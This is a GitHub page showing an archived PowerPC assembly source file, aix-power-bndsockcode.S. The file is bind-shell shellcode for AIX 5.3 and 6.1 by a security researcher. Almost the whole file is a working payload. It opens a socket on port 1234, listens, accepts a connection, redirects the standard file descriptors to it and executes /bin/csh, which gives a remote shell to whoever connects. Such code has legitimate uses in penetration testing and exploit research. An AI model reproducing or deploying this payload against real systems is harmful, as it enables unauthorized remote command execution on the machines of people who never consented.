This repository has been archived by the owner on Jan 1, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 0
/
aix-power-bndsockcode.S
140 lines (118 loc) · 2.97 KB
/
aix-power-bndsockcode.S
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
/*
* aix-power-bndsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Supported AIX versions:
*
* -DAIX614 AIX Version 6.1.4
* -DAIX613 AIX Version 6.1.3
* -DAIX612 AIX Version 6.1.2
* -DAIX611 AIX Version 6.1.1
* -DAIX5310 AIX Version 5.3.10
* -DAIX539 AIX Version 5.3.9
* -DAIX538 AIX Version 5.3.8
* -DAIX537 AIX Version 5.3.7
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
syscallcode:
xor. %r31,%r31,%r31
bnel syscallcode
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+28(%r30)
mtctr %r30
bctr
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
cal %r30,-8(%r30)
bndsockcode:
lil %r29,__CAL
# socket
xor %r5,%r5,%r5
cal %r4,-__CAL+1(%r29)
cal %r3,-__CAL+2(%r29)
cal %r2,__NC_socket(%r29)
mtctr %r30
bctrl
mr %r28,%r3
# bind
cal %r5,-__CAL+16(%r29)
liu %r27,0xff02
oril %r27,%r27,0x04d2
stu %r31,-4(%r1)
stu %r27,-4(%r1)
mr %r4,%r1
cal %r2,__NC_bind(%r29)
mtctr %r30
bctrl
# listen
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_listen(%r29)
mtctr %r30
bctrl
# accept
xor %r5,%r5,%r5
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_accept(%r29)
mtctr %r30
bctrl
mr %r26,%r3
# close
cal %r25,-__CAL+2(%r29)
0:
mr %r3,%r25
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r25
xor %r4,%r4,%r4
mr %r3,%r26
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r25,%r25,-1
bge 0b
shellcode:
# lil %r29,__CAL
xor. %r5,%r5,%r5
bnel shellcode
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)
stb %r5,-511+48(%r24)
stu %r5,-4(%r1)
stu %r3,-4(%r1)
mr %r4,%r1
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"